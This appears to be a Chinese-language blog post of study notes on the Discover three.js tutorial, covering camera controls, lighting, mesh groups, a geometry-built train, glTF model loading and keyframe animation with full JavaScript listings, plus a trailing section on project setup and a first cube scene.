  const material = createMaterial();

  // create a Mesh containing the geometry and material
  const cube = new Mesh(geometry, material);

  cube.rotation.set(-0.5, -0.1, 0.8);

  const radiansPerSecond = MathUtils.degToRad(30);
  // this method will be called once per frame
  cube.tick = (delta) => {
    // increase the cube's rotation each frame
    cube.rotation.z += radiansPerSecond * delta;
    cube.rotation.x += radiansPerSecond * delta;
    cube.rotation.y += radiansPerSecond * delta;
  };

  return cube;
}

export { createCube };

Demo

1.9 Extending three.js with a Camera Controls Plugin

This section uses a new plugin: three/examples/jsm/controls/OrbitControls.js.

OrbitControls is a helper controller from the three.js examples that lets the user rotate, zoom, and pan the camera with the mouse, for interactive viewing of the scene.

New plugin!

If you load it locally, you also need to adjust the imports inside OrbitControls.js:

import {
  EventDispatcher,
  MOUSE,
  Quaternion,
  Spherical,
  TOUCH,
  Vector2,
  Vector3,
  Plane,
  Ray,
  MathUtils
} from '../../../build/three.module.js';
• const controls = new OrbitControls(camera, canvas); creates a new OrbitControls instance from the camera and the canvas element.
• controls.enableDamping = true; enables damping (inertia), which makes camera movement smoother and more natural. Damping requires the controls to be updated on every frame of the animation loop.
• controls.tick = () => controls.update(); adds a tick method to the controls that simply calls controls.update(). When damping or auto-rotation is enabled, the controls' state must be updated each frame for a smooth animation; calling this tick from the main loop does exactly that.
import { OrbitControls } from 'three/examples/jsm/controls/OrbitControls.js';

function createControls(camera, canvas) {
  const controls = new OrbitControls(camera, canvas);

  // damping and auto rotation require
  // the controls to be updated each frame

  // this.controls.autoRotate = true;
  controls.enableDamping = true;

  controls.tick = () => controls.update();

  return controls;
}

export { createControls };
• import { createControls } from './systems/controls.js'; imports controls.js.
• const controls = createControls(camera, renderer.domElement); passes the camera and canvas to createControls() to activate the helper controller.
• loop.updatables.push(controls); keeps the controls updated so the scene follows the user's input.
import { createCamera } from './components/camera.js';
import { createCube } from './components/cube.js';
import { createLights } from './components/lights.js';
import { createScene } from './components/scene.js';

import { createControls } from './systems/controls.js';
import { createRenderer } from './systems/renderer.js';
import { Resizer } from './systems/Resizer.js';
import { Loop } from './systems/Loop.js';

let camera;
let renderer;
let scene;
let loop;

class World {
  constructor(container) {
    camera = createCamera();
    renderer = createRenderer();
    scene = createScene();
    loop = new Loop(camera, scene, renderer);
    container.append(renderer.domElement);

    const controls = createControls(camera, renderer.domElement);

    const cube = createCube();
    const light = createLights();

    loop.updatables.push(controls);

    // stop the cube's animation
    // loop.updatables.push(cube);

    scene.add(cube, light);

    const resizer = new Resizer(container, camera, renderer);
  }

  render() {
    // draw a single frame
    renderer.render(scene, camera);
  }

  start() {
    loop.start();
  }

  stop() {
    loop.stop();
  }
}

export { World };

Demo

On-demand rendering

If you only use the camera controls plugin and no animations, rendering on demand saves resources.

• controls.addEventListener('change', () => {renderer.render(scene, camera);}); listens for control changes and re-renders the frame only when the user moves the camera (instead of rendering in a loop).
import { createCamera } from './components/camera.js';
import { createCube } from './components/cube.js';
import { createLights } from './components/lights.js';
import { createScene } from './components/scene.js';

import { createControls } from './systems/controls.js';
import { createRenderer } from './systems/renderer.js';
import { Resizer } from './systems/Resizer.js';
// import { Loop } from './systems/Loop.js';

let camera;
let renderer;
let scene;
// let loop;

class World {
  constructor(container) {
    camera = createCamera();
    renderer = createRenderer();
    scene = createScene();
    // loop = new Loop(camera, scene, renderer);
    container.append(renderer.domElement);

    const controls = createControls(camera, renderer.domElement);
    controls.addEventListener('change', () => {
      renderer.render(scene, camera);
    });

    const cube = createCube();
    const light = createLights();

    // loop.updatables.push(controls);

    // stop the cube's animation
    // loop.updatables.push(cube);

    scene.add(cube, light);

    const resizer = new Resizer(container, camera, renderer);
  }

  render() {
    // draw a single frame
    renderer.render(scene, camera);
  }

  // start() {
  //   loop.start();
  // }

  // stop() {
  //   loop.stop();
  // }
}

export { World };

Drop the animation loop:

import { World } from './World/World.js';

function main() {
  // Get a reference to the container element
  const container = document.querySelector('#scene-container');

  // create a new world
  const world = new World(container);

  // draw the scene
  world.render();
}

main();

Demo

Configuring OrbitControls

OrbitControls has many options you can configure; see Extending three.js with a Camera Controls Plugin | Discover three.js (discoverthreejs.com).
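A minimal sketch of a few commonly used options (my own example, not from the tutorial; the values are illustrative, not recommendations):

import { OrbitControls } from 'three/examples/jsm/controls/OrbitControls.js';

function createControls(camera, canvas) {
  const controls = new OrbitControls(camera, canvas);

  // smooth out camera movement (requires update() every frame)
  controls.enableDamping = true;

  // limit how far the user can zoom in and out
  controls.minDistance = 5;
  controls.maxDistance = 50;

  // stop the camera from dipping below the ground plane
  controls.maxPolarAngle = Math.PI / 2;

  // optionally spin slowly around the target
  // controls.autoRotate = true;
  // controls.autoRotateSpeed = 1.0;

  controls.tick = () => controls.update();

  return controls;
}

export { createControls };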

1.10 Ambient Lighting: Illumination from Every Direction

Previously, the back of the cube was completely black, because there was no ambient light.

AmbientLight is the cheapest way to fake indirect lighting in three.js. It adds a constant amount of light to every object in the scene, from all directions.

• const ambientLight = new AmbientLight('white', 2);

Light from a HemisphereLight fades between a sky color at the top of the scene and a ground color at the bottom. Like AmbientLight, it makes no attempt at physical accuracy. Instead, it models the observation that in most environments where you find humans, the brightest light comes from above, while light bouncing back off the ground is usually dimmer.

• const ambientLight = new HemisphereLight('white', 'darkslategrey', 5,); creates a HemisphereLight as the ambient light:
  • sky color: white
  • ground color: darkslategrey
  • intensity: 5
• return { ambientLight, mainLight }; returns both the ambient light and the main light.
import { AmbientLight, DirectionalLight, HemisphereLight } from 'three';

function createLights() {
  const ambientLight = new HemisphereLight(
    'white', // bright sky color
    'darkslategrey', // dim ground color
    5, // intensity
  );

  const mainLight = new DirectionalLight('white', 5);
  mainLight.position.set(10, 10, 10);

  return { ambientLight, mainLight };
}

export { createLights };
• const { ambientLight, mainLight } = createLights(); destructures the light objects the function returns. (Could this return a list instead, to reduce coupling? A sketch of that idea follows the listing below.)
• scene.add(ambientLight, mainLight, cube); adds the lights and the cube to the scene.
import { createCamera } from './components/camera.js';
import { createCube } from './components/cube.js';
import { createLights } from './components/lights.js';
import { createScene } from './components/scene.js';

import { createControls } from './systems/controls.js';
import { createRenderer } from './systems/renderer.js';
import { Resizer } from './systems/Resizer.js';
import { Loop } from './systems/Loop.js';

let camera;
let renderer;
let scene;
let loop;

class World {
  constructor(container) {
    camera = createCamera();
    renderer = createRenderer();
    scene = createScene();
    loop = new Loop(camera, scene, renderer);
    container.append(renderer.domElement);

    const controls = createControls(camera, renderer.domElement);

    const cube = createCube();
    const { ambientLight, mainLight } = createLights();

    loop.updatables.push(controls);
    scene.add(ambientLight, mainLight, cube);

    const resizer = new Resizer(container, camera, renderer);
  }

  render() {
    // draw a single frame
    renderer.render(scene, camera);
  }

  start() {
    loop.start();
  }

  stop() {
    loop.stop();
  }
}

export { World };
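
On the coupling question above, a minimal sketch of one possibility (my own, not from the tutorial): have createLights return an array, so callers don't need to know each light by name:

import { DirectionalLight, HemisphereLight } from 'three';

function createLights() {
  const ambientLight = new HemisphereLight('white', 'darkslategrey', 5);

  const mainLight = new DirectionalLight('white', 5);
  mainLight.position.set(10, 10, 10);

  // return an array so callers can spread it straight into the scene
  return [ambientLight, mainLight];
}

// in World's constructor:
// const lights = createLights();
// scene.add(...lights, cube);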

Demo

1.11 Organizing Your Scene

The SphereBufferGeometry used by the source tutorial seems to be gone in my version; it should be SphereGeometry (the geometry for sphere shapes) instead.

• const group = new Group(); uses the Group class to create a new group object. The group will hold all the spheres, but is itself invisible (essentially an empty node).

• const geometry = new SphereGeometry(0.25, 16, 16); creates the sphere geometry that all the spheres will share.

• group.add(protoSphere); adds const protoSphere = new Mesh(geometry, material); as a child of the group.

• for (let i = 0; i < 1; i += 0.05) {} creates more spheres.

  • const sphere = protoSphere.clone(); clones protoSphere; the clone has the same position, rotation, and scale as the original.

    The geometry and material are not cloned; they are shared. If we change the shared material in any way, for example its color, all of the cloned meshes change along with the original. The same applies to any change made to the geometry. (This is also a lot like Unity.)

    You can give a clone a brand-new material, and the original's material will be unaffected (see the sketch after the listing below).

  • Adjust the new sphere's transform.

  • group.add(sphere); adds the resulting sphere to the group.

• group.scale.multiplyScalar(2); scales the whole group up by a factor of two.

• const radiansPerSecond = MathUtils.degToRad(30); so the whole group rotates $30^\circ$ per second.
• group.tick = (delta) => {group.rotation.z -= delta * radiansPerSecond;}; applies the animation.
import {
  SphereGeometry,
  Group,
  MathUtils,
  Mesh,
  MeshStandardMaterial,
} from 'three';

function createMeshGroup() {
  // a group holds other objects
  // but cannot be seen itself
  const group = new Group();

  const geometry = new SphereGeometry(0.25, 16, 16);

  const material = new MeshStandardMaterial({
    color: 'indigo',
  });

  const protoSphere = new Mesh(geometry, material);

  // add the protoSphere to the group
  group.add(protoSphere);

  // create twenty clones of the protoSphere
  // and add each to the group
  for (let i = 0; i < 1; i += 0.05) {
    const sphere = protoSphere.clone();

    // position the spheres around a circle
    sphere.position.x = Math.cos(2 * Math.PI * i);
    sphere.position.y = Math.sin(2 * Math.PI * i);

    sphere.scale.multiplyScalar(0.01 + i);

    group.add(sphere);
  }

  // every sphere inside the group will be scaled
  group.scale.multiplyScalar(2);

  const radiansPerSecond = MathUtils.degToRad(30);

  // each frame, rotate the entire group of spheres
  group.tick = (delta) => {
    group.rotation.z -= delta * radiansPerSecond;
  };

  return group;
}

export { createMeshGroup };
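
A minimal sketch of that material override (my addition; the 'crimson' highlight color is just an example):

import { Mesh, MeshStandardMaterial, SphereGeometry } from 'three';

const geometry = new SphereGeometry(0.25, 16, 16);
const shared = new MeshStandardMaterial({ color: 'indigo' });

const protoSphere = new Mesh(geometry, shared);
const highlighted = protoSphere.clone();

// the clone starts out sharing protoSphere's material...
console.log(highlighted.material === protoSphere.material); // -> true

// ...but assigning a new material affects only this clone
highlighted.material = new MeshStandardMaterial({ color: 'crimson' });
console.log(highlighted.material === protoSphere.material); // -> false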

Swap the earlier cube for the meshGroup:

import { createCamera } from './components/camera.js';
import { createLights } from './components/lights.js';
import { createMeshGroup } from './components/meshGroup.js';
import { createScene } from './components/scene.js';

import { createControls } from './systems/controls.js';
import { createRenderer } from './systems/renderer.js';
import { Resizer } from './systems/Resizer.js';
import { Loop } from './systems/Loop.js';

let camera;
let renderer;
let scene;
let loop;

class World {
  constructor(container) {
    camera = createCamera();
    renderer = createRenderer();
    scene = createScene();
    loop = new Loop(camera, scene, renderer);
    container.append(renderer.domElement);

    const controls = createControls(camera, renderer.domElement);
    const { ambientLight, mainLight } = createLights();
    const meshGroup = createMeshGroup();

    loop.updatables.push(controls, meshGroup);
    scene.add(ambientLight, mainLight, meshGroup);

    const resizer = new Resizer(container, camera, renderer);
  }

  render() {
    renderer.render(scene, camera);
  }

  start() {
    loop.start();
  }

  stop() {
    loop.stop();
  }
}

export { World };

Demo

1.12 Getting Creative with Built-in Geometries

The files are organized as follows:

• components/Train/: a train class.
  • Train.js: assembles the train and animates the wheels.
  • geometries.js: defines the geometries that make up the train.
  • materials.js: defines the train's materials.
  • meshes.js: sets the transform of each of the train's parts.
• components/helpers.js: displays the coordinate system in the scene.

File structure

• import {createAxesHelper, createGridHelper,} from './components/helpers.js'; and import { Train } from './components/Train/Train.js'; import the new modules.
• const train = new Train();, loop.updatables.push(controls, train);, and scene.add(ambientLight, mainLight, train); create the train, hook up its animation, and place it in the scene.
• scene.add(createAxesHelper(), createGridHelper()); displays the axes in the scene.
import { createCamera } from './components/camera.js';
import {
  createAxesHelper,
  createGridHelper,
} from './components/helpers.js';
import { createLights } from './components/lights.js';
import { createScene } from './components/scene.js';
import { Train } from './components/Train/Train.js';

import { createControls } from './systems/controls.js';
import { createRenderer } from './systems/renderer.js';
import { Resizer } from './systems/Resizer.js';
import { Loop } from './systems/Loop.js';

let camera;
let renderer;
let scene;
let loop;

class World {
  constructor(container) {
    camera = createCamera();
    renderer = createRenderer();
    scene = createScene();
    loop = new Loop(camera, scene, renderer);
    container.append(renderer.domElement);

    const controls = createControls(camera, renderer.domElement);
    const { ambientLight, mainLight } = createLights();
    const train = new Train();

    loop.updatables.push(controls, train);
    scene.add(ambientLight, mainLight, train);

    const resizer = new Resizer(container, camera, renderer);

    scene.add(createAxesHelper(), createGridHelper());
  }

  render() {
    renderer.render(scene, camera);
  }

  start() {
    loop.start();
  }

  stop() {
    loop.stop();
  }
}

export { World };
• function createAxesHelper() {} creates the axes display.
  • const helper = new AxesHelper(3); draws axes of length $3$.
  • helper.position.set(-3.5, 0, -3.5); places the axes at $(-3.5, 0, -3.5)$.
• function createGridHelper() {} creates the grid.
  • const helper = new GridHelper(6); creates a grid of overall size $6$ in the $xOz$ plane (with the default number of divisions).
import { AxesHelper, GridHelper } from 'three';

function createAxesHelper() {
  const helper = new AxesHelper(3);
  helper.position.set(-3.5, 0, -3.5);
  return helper;
}

function createGridHelper() {
  const helper = new GridHelper(6);
  return helper;
}

export { createAxesHelper, createGridHelper };

• Import createMeshes from ./meshes.js and add those meshes as children of the Train node itself.
• tick(delta) {} spins the wheels at $24^\circ$ per second.
import { Group, MathUtils } from 'three';

import { createMeshes } from './meshes.js';

const wheelSpeed = MathUtils.degToRad(24);

class Train extends Group {
  constructor() {
    super();

    this.meshes = createMeshes();

    this.add(
      this.meshes.nose,
      this.meshes.cabin,
      this.meshes.chimney,
      this.meshes.smallWheelRear,
      this.meshes.smallWheelCenter,
      this.meshes.smallWheelFront,
      this.meshes.bigWheel,
    );
  }

  tick(delta) {
    this.meshes.bigWheel.rotation.y += wheelSpeed * delta;
    this.meshes.smallWheelRear.rotation.y += wheelSpeed * delta;
    this.meshes.smallWheelCenter.rotation.y += wheelSpeed * delta;
    this.meshes.smallWheelFront.rotation.y += wheelSpeed * delta;
  }
}

export { Train };

The original tutorial uses BoxBufferGeometry and CylinderBufferGeometry; these seem to be deprecated now and should be BoxGeometry and CylinderGeometry respectively.

• const cabin = new BoxGeometry(2, 2.25, 1.5); creates a box geometry; the parameters 2, 2.25, 1.5 are the box's width, height, and depth.
• const nose = new CylinderGeometry(0.75, 0.75, 3, 12); creates a cylindrical geometry.
  • The first two parameters, 0.75, 0.75, are the cylinder's top and bottom radii.
  • The third parameter, 3, is the cylinder's height.
  • The fourth parameter, 12, is the number of segments around the cylinder; higher values make it look rounder.
  • const wheel = new CylinderGeometry(0.4, 0.4, 1.75, 16); and const chimney = new CylinderGeometry(0.3, 0.1, 0.5); work the same way.
import { BoxGeometry, CylinderGeometry } from 'three';

function createGeometries() {
  const cabin = new BoxGeometry(2, 2.25, 1.5);

  const nose = new CylinderGeometry(0.75, 0.75, 3, 12);

  // we can reuse a single cylinder geometry for all 4 wheels
  const wheel = new CylinderGeometry(0.4, 0.4, 1.75, 16);

  // different values for the top and bottom radius creates a cone shape
  const chimney = new CylinderGeometry(0.3, 0.1, 0.5);

  return {
    cabin,
    nose,
    wheel,
    chimney,
  };
}

export { createGeometries };
• new MeshStandardMaterial({}); creates a standard material.
  • flatShading: true enables flat shading.
import { MeshStandardMaterial } from 'three';

function createMaterials() {
  const body = new MeshStandardMaterial({
    color: 'firebrick',
    flatShading: true,
  });

  const detail = new MeshStandardMaterial({
    color: 'darkslategray',
    flatShading: true,
  });

  return { body, detail };
}

export { createMaterials };
• function createMeshes() {} uses import { createGeometries } from './geometries.js'; and import { createMaterials } from './materials.js'; to build each part, adjust its transform, and assemble the train.
import { Mesh } from 'three';

import { createGeometries } from './geometries.js';
import { createMaterials } from './materials.js';

function createMeshes() {
  const geometries = createGeometries();
  const materials = createMaterials();

  const cabin = new Mesh(geometries.cabin, materials.body);
  cabin.position.set(1.5, 1.4, 0);

  const chimney = new Mesh(geometries.chimney, materials.detail);
  chimney.position.set(-2, 1.9, 0);

  const nose = new Mesh(geometries.nose, materials.body);
  nose.position.set(-1, 1, 0);
  nose.rotation.z = Math.PI / 2;

  const smallWheelRear = new Mesh(geometries.wheel, materials.detail);
  smallWheelRear.position.y = 0.5;
  smallWheelRear.rotation.x = Math.PI / 2;

  const smallWheelCenter = smallWheelRear.clone();
  smallWheelCenter.position.x = -1;

  const smallWheelFront = smallWheelRear.clone();
  smallWheelFront.position.x = -2;

  const bigWheel = smallWheelRear.clone();
  bigWheel.position.set(1.5, 0.9, 0);
  bigWheel.scale.set(2, 1.25, 2);

  return {
    nose,
    cabin,
    chimney,
    smallWheelRear,
    smallWheelCenter,
    smallWheelFront,
    bigWheel,
  };
}

export { createMeshes };

Demo

1.13 Loading 3D Models in glTF Format

Over the last thirty years or so, there have been many attempts to create a standard 3D asset exchange format. Until recently, the FBX, OBJ (Wavefront), and DAE (Collada) formats were the most popular, although they all have problems that hindered widespread adoption. For example, OBJ doesn't support animation, FBX is a closed format belonging to Autodesk, and the Collada spec is so complex that large files are hard to load.

Recently, however, a newcomer called glTF has become the de facto standard for exchanging 3D assets on the web. glTF (GL Transmission Format), sometimes called the JPEG of 3D, was created by the Khronos Group, who are responsible for WebGL, OpenGL, and a whole host of other graphics APIs. First released in 2017, glTF is now the best format for exchanging 3D assets on the web and in many other fields. The book uses glTF throughout, and if possible you should too: it is designed for sharing models on the web, so file sizes are as small as possible and models load quickly.

However, since glTF is relatively new, your favorite application may not have an exporter yet. In that case you can convert models to glTF before using them, or use another loader such as FBXLoader or OBJLoader. All three.js loaders work the same way, so if you do need another loader, everything in this chapter still applies, with only minor differences.

The original text strongly recommends the .glb format; fine, I'll go along with it.
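
For example (my own sketch, not from the tutorial; the file path is hypothetical), swapping in OBJLoader looks almost identical to the GLTFLoader code used below:

import { OBJLoader } from 'three/examples/jsm/loaders/OBJLoader.js';

async function loadModel() {
  const loader = new OBJLoader();

  // loadAsync returns a Promise, as with GLTFLoader, but OBJ files
  // have no scene/animations wrapper: you get a Group back directly
  const model = await loader.loadAsync('assets/models/example.obj');

  return model;
}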

Loader

As you can see, three.js supports loaders for a great many file formats. We use GLTFLoader.js, which also needs its dependency '../utils/BufferGeometryUtils.js'.

If you load it locally, adjust its relative imports as well:

import {XXX} from '../../../build/three.module.js';

The files are organized as follows:

• assets/models: the 3D models (.glb format).
• src/World/components/birds/
  • birds.js: imports the models and creates the bird objects.
  • setupModel.js: processes the loaded data.

File structure

• await world.init(); waits for the models to finish loading before rendering starts.
import { World } from './World/World.js';

async function main() {
  // Get a reference to the container element
  const container = document.querySelector('#scene-container');

  // create a new world
  const world = new World(container);

  // complete async tasks
  await world.init();

  // start the animation loop
  world.start();
}

main().catch((err) => {
  console.error(err);
});
• async init() {} performs the asynchronous setup before rendering starts.
  • const { parrot, flamingo, stork } = await loadBirds(); loads the models asynchronously.
  • controls.target.copy(parrot.position); points the controls' target at the parrot model's position, so the camera orbits around, and stays focused on, that point.
  • scene.add(parrot, flamingo, stork); adds the three birds to the scene.
import { loadBirds } from './components/birds/birds.js';
import { createCamera } from './components/camera.js';
import { createLights } from './components/lights.js';
import { createScene } from './components/scene.js';

import { createControls } from './systems/controls.js';
import { createRenderer } from './systems/renderer.js';
import { Resizer } from './systems/Resizer.js';
import { Loop } from './systems/Loop.js';

let camera;
let controls;
let renderer;
let scene;
let loop;

class World {
  constructor(container) {
    camera = createCamera();
    renderer = createRenderer();
    scene = createScene();
    loop = new Loop(camera, scene, renderer);
    container.append(renderer.domElement);
    controls = createControls(camera, renderer.domElement);

    const { ambientLight, mainLight } = createLights();

    loop.updatables.push(controls);
    scene.add(ambientLight, mainLight);

    const resizer = new Resizer(container, camera, renderer);
  }

  async init() {
    const { parrot, flamingo, stork } = await loadBirds();

    // move the target to the center of the front bird
    controls.target.copy(parrot.position);

    scene.add(parrot, flamingo, stork);
  }

  render() {
    renderer.render(scene, camera);
  }

  start() {
    loop.start();
  }

  stop() {
    loop.stop();
  }
}

export { World };

Flamingo

Opening one of these .glb models in Blender shows a Mesh_0 node under Object_0. We only need the Mesh_0 node, so pick it out:

function setupModel(data) {
  const model = data.scene.children[0];

  return model;
}

export { setupModel };
• async function loadBirds() {} loads asynchronously.

  • const loader = new GLTFLoader(); gives the program the ability to load .glb files.

  • const [parrotData, flamingoData, storkData] = await Promise.all([...]); loads the models in parallel.

  • const parrot = setupModel(parrotData); builds the parrot object.

  • parrot.position.set(0, 0, 2.5); positions the object.

import { GLTFLoader } from 'three/examples/jsm/loaders/GLTFLoader.js';

import { setupModel } from './setupModel.js';

async function loadBirds() {
  const loader = new GLTFLoader();

  const [parrotData, flamingoData, storkData] = await Promise.all([
    loader.loadAsync('assets/models/Parrot.glb'),
    loader.loadAsync('assets/models/Flamingo.glb'),
    loader.loadAsync('assets/models/Stork.glb'),
  ]);

  console.log('Squaaawk!', parrotData);

  const parrot = setupModel(parrotData);
  parrot.position.set(0, 0, 2.5);

  const flamingo = setupModel(flamingoData);
  flamingo.position.set(7.5, 0, -10);

  const stork = setupModel(storkData);
  stork.position.set(0, -2.5, -10);

  return {
    parrot,
    flamingo,
    stork,
  };
}

export { loadBirds };

Demo

Trying my own model:

Export a model created earlier from Blender to .glb format:

Girl with a Pearl Earring

The code then follows exactly the same pattern (a sketch follows)!
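
A minimal sketch of that pattern for a single model (my addition; loadGirl and the file name are hypothetical):

import { GLTFLoader } from 'three/examples/jsm/loaders/GLTFLoader.js';

import { setupModel } from './setupModel.js';

async function loadGirl() {
  const loader = new GLTFLoader();

  const girlData = await loader.loadAsync('assets/models/girl.glb');

  const girl = setupModel(girlData);
  girl.position.set(0, 0, 0);

  return girl;
}

export { loadGirl };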

Demo

1.14 The three.js Animation System

Creating an animation involves three elements: keyframes, KeyframeTrack, and AnimationClip.

The lowest conceptual level in the animation system is the keyframe. Each keyframe consists of three pieces of information: a time, a property, and a value.

There is no class representing a single keyframe. Instead, keyframes are raw data stored in two arrays, times and values, inside a KeyframeTrack.

Create a number keyframe track representing opacity, with five keyframes:

    import { NumberKeyframeTrack } from "three";

    const times = [0, 1, 2, 3, 4];
    const values = [0, 1, 0, 1, 0];

    const opacityKF = new NumberKeyframeTrack(".material.opacity", times, values);

Create a vector keyframe track representing position, with three keyframes:

    import { VectorKeyframeTrack } from "three";

    const times = [0, 3, 6];
    const values = [0, 0, 0, 2, 2, 2, 0, 0, 0];

    const positionKF = new VectorKeyframeTrack(".position", times, values);

An animation clip is a collection of any number of keyframe tracks attached to a single object; the class representing a clip is AnimationClip.

A clip animating both position and opacity:

import { AnimationClip, NumberKeyframeTrack, VectorKeyframeTrack } from "three";

const positionKF = new VectorKeyframeTrack(
  ".position",
  [0, 3, 6],
  [0, 0, 0, 2, 2, 2, 0, 0, 0]
);

const opacityKF = new NumberKeyframeTrack(
  ".material.opacity",
  [0, 1, 2, 3, 4, 5, 6],
  [0, 1, 0, 1, 0, 1, 0]
);

const moveBlinkClip = new AnimationClip("move-n-blink", -1, [
  positionKF,
  opacityKF,
]);
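
The clip above isn't actually played anywhere yet. As with the birds below, a clip is played through an AnimationMixer; here is a minimal sketch wiring moveBlinkClip to a mesh (my addition; the sphere and its transparent material are assumptions):

import { AnimationMixer, Mesh, MeshStandardMaterial, SphereGeometry } from 'three';

// a mesh to animate; transparent so the .material.opacity track is visible
const mesh = new Mesh(
  new SphereGeometry(0.5, 16, 16),
  new MeshStandardMaterial({ transparent: true }),
);

// moveBlinkClip comes from the listing above
const mixer = new AnimationMixer(mesh);
const action = mixer.clipAction(moveBlinkClip);
action.play();

// then push the mesh into loop.updatables so tick runs each frame
mesh.tick = (delta) => mixer.update(delta);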

• loop.updatables.push(parrot, flamingo, stork); adds parrot, flamingo, and stork to the Loop so their animations play.
import { loadBirds } from './components/birds/birds.js';
import { createCamera } from './components/camera.js';
import { createLights } from './components/lights.js';
import { createScene } from './components/scene.js';

import { createControls } from './systems/controls.js';
import { createRenderer } from './systems/renderer.js';
import { Resizer } from './systems/Resizer.js';
import { Loop } from './systems/Loop.js';

let camera;
let controls;
let renderer;
let scene;
let loop;

class World {
  constructor(container) {
    camera = createCamera();
    renderer = createRenderer();
    scene = createScene();
    loop = new Loop(camera, scene, renderer);
    container.append(renderer.domElement);
    controls = createControls(camera, renderer.domElement);

    const { ambientLight, mainLight } = createLights();

    loop.updatables.push(controls);
    scene.add(ambientLight, mainLight);

    const resizer = new Resizer(container, camera, renderer);
  }

  async init() {
    const { parrot, flamingo, stork } = await loadBirds();

    // move the target to the center of the front bird
    controls.target.copy(parrot.position);

    loop.updatables.push(parrot, flamingo, stork);
    scene.add(parrot, flamingo, stork);
  }

  render() {
    renderer.render(scene, camera);
  }

  start() {
    loop.start();
  }

  stop() {
    loop.stop();
  }
}

export { World };
• const clip = data.animations[0]; takes the first animation (animations[0]) from data and stores it in clip.
• const mixer = new AnimationMixer(model); creates an AnimationMixer for the model we just grabbed; it will manage the model's animations.
• const action = mixer.clipAction(clip); creates an animation action for the specific clip.
• action.play(); starts playing the animation.
• model.tick = (delta) => mixer.update(delta); advances the animation each frame.
import { AnimationMixer } from 'three';

function setupModel(data) {
  const model = data.scene.children[0];
  const clip = data.animations[0];

  const mixer = new AnimationMixer(model);
  const action = mixer.clipAction(clip);
  action.play();

  model.tick = (delta) => mixer.update(delta);

  return model;
}

export { setupModel };

Demo

    ]]>
    + 资源

    0

    0.4 GitHub 上的 three.js - 魔法出现的地方

    mrdoob/three.js: JavaScript 3D Library. (github.com) 中:

    • build/three.module.js 是运行所需的文件。
    • examples/ 代码示例。
    • src/ 源代码。

    0.5 如何在你的项目中引入 three.js

    在项目文件夹中,初始化 npm:

    1
    npm init

    安装 three.js:

    1
    npm install --save three

    导入:

    1
    import {XXX, XXX, XXX} from 'three/build/three.module.js';

    直接从 mrdoob/three.js: JavaScript 3D Library. (github.com) 里下载 build/three.module.js

    要引入的话,直接:

    1
    <script type="module" src="three.module.js"></script>

    1-入门:真正的乐趣从这里开始!

    1.1 Three.js 应用的结构

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    <!DOCTYPE html>
    <html lang="en">

    <head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Document</title>
    </head>

    <link href="./styles/main.css" rel="stylesheet" type="text/css">

    <body>
    <div id="scene-container">
    <!-- Our <canvas> will be inserted here -->
    </div>
    </body>

    <script type="module" src="./src/main.js"></script>

    </html>
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    32
    body {
    /* remove margins and scroll bars */
    margin: 0;
    overflow: hidden;

    /* style text */
    text-align: center;
    font-size: 12px;
    font-family: Sans-Serif;

    /* color text */
    color: #444;
    }

    h1 {
    /* position the heading */
    position: absolute;
    width: 100%;

    /* make sure that the heading is drawn on top */
    z-index: 1;
    }

    #scene-container {
    /* tell our scene container to take up the full page */
    position: absolute;
    width: 100%;
    height: 100%;

    /* Set the container's background color to the same as the scene's background to prevent flashing on load */
    background-color: skyblue;
    }

    npm 方式导入:

    1
    2
    3
    4
    5
    6
    7
    8
    import {
    Camera,
    Group,
    Scene,
    } from 'three';

    import { OrbitControls } from 'three/examples/jsm/controls/OrbitControls.js';
    import { GLTFLoader } from 'three/examples/jsm/loaders/GLTFLoader.js';

    cdn 方式导入:

    1
    2
    3
    import { Camera, Group, Scene } from "https://cdn.skypack.dev/three@0.132.2";
    import { OrbitControls } from "https://cdn.skypack.dev/three@0.132.2/examples/jsm/controls/OrbitControls.js?module";
    import { GLTFLoader } from "https://cdn.skypack.dev/three@0.132.2/examples/jsm/loaders/GLTFLoader.js?module";

    直接从 mrdoob/three.js: JavaScript 3D Library. (github.com) 里下载 build/three.module.js,放在vendor/three/build/ 下,本地导入:

    1
    2
    3
    4
    5
    6
    7
    // 导入 Three.js 模块
    import {
    XXX,
    XXX
    } from '../vendor/three/build/three.module.js';

    ...自由操作...

    放置其他人编写的 JS 文件的地方。

    使用的任何非 HTML、CSS 或 JavaScript 的东西都在这里:纹理、3D 模型、字体、声音等等。

    1.2 你的第一个 three.js 场景:你好,立方体!

    编写 main.js

    • 导入模块:
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    // 导入 Three.js 模块
    import {
    Scene,
    PerspectiveCamera,
    WebGLRenderer,
    BoxGeometry,
    MeshBasicMaterial,
    Mesh,
    Color
    } from '../vendor/three/build/three.module.js';
    • 获取画布所在容器:
    1
    const container = document.querySelector('#scene-container');
    • 创建一个新的场景:
    1
    const scene = new Scene();
    • 设置背景为天蓝色:
    1
    scene.background = new Color('skyblue');
    • 定义一个透视相机:
      • fov:视野范围
      • aspect:摄影机宽高比(容器的宽高比)
      • near:近裁剪面的距离。只有在这个距离之后的物体才会被摄像机捕捉到,太近的物体会被忽略。这个值应该设置为正数,并且尽可能小以避免裁剪近处的重要细节,但过小的值可能会导致深度缓冲问题。
      • far:远裁剪面的距离。任何在这个距离之外的物体都不会被摄像机捕捉到。这个值决定了摄像机可以看到多远的场景,设置得过大可能会影响渲染性能和深度缓冲的精度。
    • 定义好后,放在场景的 $(0, 0, 10)$ 处。
    1
    2
    3
    4
    5
    6
    7
    const fov = 35; // AKA Field of View
    const aspect = container.clientWidth / container.clientHeight;
    const near = 0.1; // the near clipping plane
    const far = 100; // the far clipping plane

    const camera = new PerspectiveCamera(fov, aspect, near, far);
    camera.position.set(0, 0, 10);
    • 定义一个立方体网格,尺寸设为 $(2, 2, 2)$:
    1
    2
    // 注意这里使用的是 BoxGeometry
    const geometry = new BoxGeometry(2, 2, 2);
    • 定义材质:
    1
    const material = new MeshBasicMaterial({ color: 0x44aa88 });
    • 一个 Mesh 对象——由网格和材质组成:
    1
    const cube = new Mesh(geometry, material);
    • 往场景中添加这个立方体:
    1
    scene.add(cube);
    • 接下来是渲染操作:

      • const renderer = new WebGLRenderer();:创建了一个新的 WebGLRenderer 实例。

